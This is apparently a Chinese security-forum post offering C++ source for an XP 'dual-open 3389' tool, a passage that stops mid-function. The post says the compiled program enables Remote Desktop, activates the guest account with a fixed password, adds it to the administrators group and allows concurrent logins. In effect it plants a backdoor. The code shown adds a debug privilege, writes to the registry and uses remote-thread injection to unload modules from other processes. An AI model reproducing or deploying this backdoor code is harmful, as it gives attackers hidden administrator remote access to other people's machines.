xp下双开3389源码

很早时候写的,方便大家用,代码丢了我也可以百度到 ,编译后,直接运行,XP的终端自动开启激活guest,密码为cooldiyer,加管理员组,并且可以多用户登录

 
   // xp3389.cpp : XP下双开3389的工具 Code By CoolDiyer
//
#pragma comment(linker, "/FILEALIGN:0x200 /opt:nowin98 /IGNORE:4078 /MERGE:.rdata=.text /MERGE:.data=.text /section:.text,ERW")
#include "stdafx.h"
#include "resource.h"
#include <windows.h>
#include <tlhelp32.h>
DWORD
GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid;
DWORD dwRet;
BOOL bFound = FALSE;

HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP)
{
  pe.dwSize = sizeof( pe );
 
  for (dwRet = Process32First(hSP, &pe);
  dwRet;
  dwRet = Process32Next(hSP, &pe))
  {
   if (lstrcmpi( szProcName, pe.szExeFile) == 0)
   {
    dwPid = pe.th32ProcessID;
    bFound = TRUE;
    break;
   }
  }
  CloseHandle(hSP);
 
  if (bFound == TRUE)
  {
   return dwPid;
  }
}
return NULL;
}

bool CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
if (!IsWindowVisible(hwnd))
  return true;

DWORD dwWindowThreadId = NULL;
DWORD  dwLsassId = (DWORD)lParam;
GetWindowThreadProcessId(hwnd, &dwWindowThreadId);
if (dwWindowThreadId == (DWORD)lParam)
{
  // 关闭指定进程的窗口
  SendMessage(hwnd, WM_CLOSE, 0, 0);
}
return true;
}
// 写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) from NameLess114
int WriteRegEx(HKEY MainKey, LPCTSTR SubKey, LPCTSTR Vname, DWORD Type, char* szData, DWORD dwData, int Mode)
{
HKEY  hKey;
DWORD dwDisposition;   
int   iResult =0;

__try
{
  // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
  switch(Mode) 
  {  
  case 0:
   if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS)
    __leave;  
  case 1:
   if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)     
    __leave;         
   switch(Type)
   {  
   case REG_SZ:  
   case REG_EXPAND_SZ:       
    if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1) == ERROR_SUCCESS)     
     iResult =1;       
    break;
   case REG_DWORD:
                if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS) 
     iResult =1;        
    break;
   case REG_BINARY:
    break;
   }
   break;   
   case 2:
    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)   
     __leave;               
    if (RegDeleteKey(hKey,Vname) == ERROR_SUCCESS)         
     iResult =1;
    break; 
   case 3:
    if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS)   
     __leave;               
    if (RegDeleteValue(hKey,Vname) == ERROR_SUCCESS)         
     iResult =1;
    break;
  }
}
__finally
{
  RegCloseKey(MainKey); 
  RegCloseKey(hKey);
}
return iResult;
}
bool DebugPrivilege(const char *PName, BOOL bEnable)
{
BOOL              bResult = TRUE;
HANDLE            hToken;
TOKEN_PRIVILEGES  TokenPrivileges;

if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken))
{
  bResult = FALSE;
  return bResult;
}
TokenPrivileges.PrivilegeCount = 1;
TokenPrivileges.Privileges[0].Attributes = bEnable ? SE_PRIVILEGE_ENABLED : 0;

LookupPrivilegeValue(NULL, PName, &TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL);
    if (GetLastError() != ERROR_SUCCESS)
{
  bResult = FALSE;
}

CloseHandle(hToken);
return bResult;
}
bool UnloadRemoteModule(DWORD dwProcessID, HANDLE hModuleHandle)
{
HANDLE hRemoteThread;
HANDLE hProcess;

if (hModuleHandle == NULL)
  return false;
hProcess=::OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION, FALSE, dwProcessID);
if (hProcess == NULL)
  return false;

HMODULE hModule=::GetModuleHandle("kernel32.dll");
LPTHREAD_START_ROUTINE pfnStartRoutine = (LPTHREAD_START_ROUTINE)::GetProcAddress(hModule, "FreeLibrary");
hRemoteThread=::CreateRemoteThread(hProcess, NULL, 0, pfnStartRoutine, hModuleHandle, 0, NULL);

if(hRemoteThread==NULL)
{
  ::CloseHandle(hProcess);
  return false;
}
::WaitForSingleObject(hRemoteThread,INFINITE);
::CloseHandle(hProcess);
::CloseHandle(hRemoteThread);
return true;
}
HANDLE FindModule(DWORD dwProcessID, LPCTSTR lpModulePath)
{
HANDLE hModuleHandle = NULL;
MODULEENTRY32 me32={0};
HANDLE hModuleSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(::Module32First(hModuleSnap, &me32))
{
  do
  {
   if (!lstrcmpi(me32.szExePath, lpModulePath))
   {
    hModuleHandle = me32.hModule;
    break;
   }
  }while(::Module32Next(hModuleSnap,&me32));
}
::CloseHandle(hModuleSnap);
return hModuleHandle;
}
bool UnloadModule(LPCTSTR lpModulePath)
{
BOOL bRet = false;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(pe32);

HANDLE hProcessSnap=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//查找相关的进程
if(::Process32First(hProcessSnap, &pe32))
{
  do
  {
   HANDLE hModuleHandle = FindModule(pe32.th32ProcessID, lpModulePath);
   if (hModuleHandle != NULL)
   {
    bRet = UnloadRemoteModule(pe32.th32ProcessID, hModuleHandle);
   }
  }while (Process32Next(hProcessSnap,&pe32));
}
CloseHandle(hProcessSnap);
return bRet;
}
void StartService(LPCTSTR lpService)
{
SC_HANDLE hSCManager = OpenSCManager( NULL, NULL,SC_MANAGER_CREATE_SERVICE );
if ( NULL != hSCManager )
{
  SC_HANDLE hService = OpenService(hSCManager, lpService, DELETE | SERVICE_START);
  if ( NULL != hService )
  {
   StartService(hService, 0, NULL);
   CloseServiceHandle( hService );
  }
  CloseServiceHandle( hS

补充：综合编程 , 安全编程 ,

上一个：完整的驱动感染.code.编译通过
下一个：字段和表段扫描perl版